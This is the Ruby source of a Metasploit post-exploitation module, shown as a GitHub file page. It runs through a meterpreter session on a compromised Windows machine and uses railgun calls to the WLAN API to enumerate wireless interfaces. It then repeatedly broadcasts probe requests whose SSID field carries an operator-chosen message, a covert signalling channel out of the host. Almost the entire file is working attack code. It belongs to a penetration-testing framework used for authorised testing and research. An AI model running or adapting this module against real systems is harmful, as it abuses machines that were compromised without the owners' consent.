-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
wlan_probe_request.rb
155 lines (141 loc) · 4.97 KB
/
wlan_probe_request.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Send Probe Request Packets',
'Description' => %q{
This module send probe requests through the wlan interface.
The ESSID field will be use to set a custom message.
},
'License' => MSF_LICENSE,
'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>' ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_railgun_api
stdapi_sys_process_attach
stdapi_sys_process_getpid
]
}
}
)
)
register_options(
[
OptString.new('SSID', [true, 'Message to be embedded in the SSID field', '']),
OptInt.new('TIMEOUT', [false, 'Timeout in seconds running probes', '30'])
]
)
end
def run
ssid = datastore['SSID']
time = datastore['TIMEOUT']
if ssid.length > 32
print_error('The SSID must be equal to or less than 32 bytes')
return
end
mypid = client.sys.process.getpid
@host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)
@wlanapi = client.railgun.wlanapi
wlan_handle = open_handle
unless wlan_handle
print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")
print_error('On Windows XP this could also mean the Wireless Zero Configuration Service is turned off')
return
end
# typedef struct _DOT11_SSID {
# ULONG uSSIDLength;
# UCHAR ucSSID[DOT11_SSID_MAX_LENGTH];
# } DOT11_SSID, *PDOT11_SSID;
pDot11Ssid = [ssid.length].pack('L<') << ssid
wlan_iflist = enum_interfaces(wlan_handle)
if wlan_iflist.empty?
print_status('Wlan interfaces not found')
return
end
print_status("Wlan interfaces found: #{wlan_iflist.length}")
print_status("Sending probe requests for #{time} seconds")
begin
::Timeout.timeout(time) do
loop do
wlan_iflist.each do |interface|
vprint_status("Interface Guid: #{interface['guid'].unpack('H*')[0]}")
vprint_status("Interface State: #{interface['state']}")
vprint_status("DOT11_SSID payload: #{pDot11Ssid.chars.map { |c| c.ord.to_s(16) }.join(':')}")
@wlanapi.WlanScan(wlan_handle, interface['guid'], pDot11Ssid, nil, nil)
sleep(10)
end
end
end
rescue ::Timeout::Error
closehandle = @wlanapi.WlanCloseHandle(wlan_handle, nil)
if closehandle['return'] == 0
print_status('WlanAPI Handle closed successfully')
else
print_error('There was an error closing the Handle')
end
end
end
# Function borrowed from @theLightCosine wlan_* modules
def open_handle
begin
wlhandle = @wlanapi.WlanOpenHandle(2, nil, 4, 4)
rescue StandardError
return nil
end
return wlhandle['phClientHandle']
end
# Function borrowed from @theLightCosine wlan_* modules
def enum_interfaces(wlan_handle)
iflist = @wlanapi.WlanEnumInterfaces(wlan_handle, nil, 4)
pointer = iflist['ppInterfaceList']
numifs = @host_process.memory.read(pointer, 4)
numifs = numifs.unpack('V')[0]
interfaces = []
# Set the pointer ahead to the first element in the array
pointer = (pointer + 8)
(1..numifs).each do |_i|
interface = {}
# Read the GUID (16 bytes)
interface['guid'] = @host_process.memory.read(pointer, 16)
pointer = (pointer + 16)
# Read the description(up to 512 bytes)
interface['description'] = @host_process.memory.read(pointer, 512)
pointer = (pointer + 512)
# Read the state of the interface (4 bytes)
state = @host_process.memory.read(pointer, 4)
pointer = (pointer + 4)
# Turn the state into human readable form
state = state.unpack('V')[0]
case state
when 0
interface['state'] = 'The interface is not ready to operate.'
when 1
interface['state'] = 'The interface is connected to a network.'
when 2
interface['state'] = 'The interface is the first node in an ad hoc network. No peer has connected.'
when 3
interface['state'] = 'The interface is disconnecting from the current network.'
when 4
interface['state'] = 'The interface is not connected to any network.'
when 5
interface['state'] = 'The interface is attempting to associate with a network.'
when 6
interface['state'] = 'Auto configuration is discovering the settings for the network.'
when 7
interface['state'] = 'The interface is in the process of authenticating.'
else
interface['state'] = 'Unknown State'
end
interfaces << interface
end
return interfaces
end
end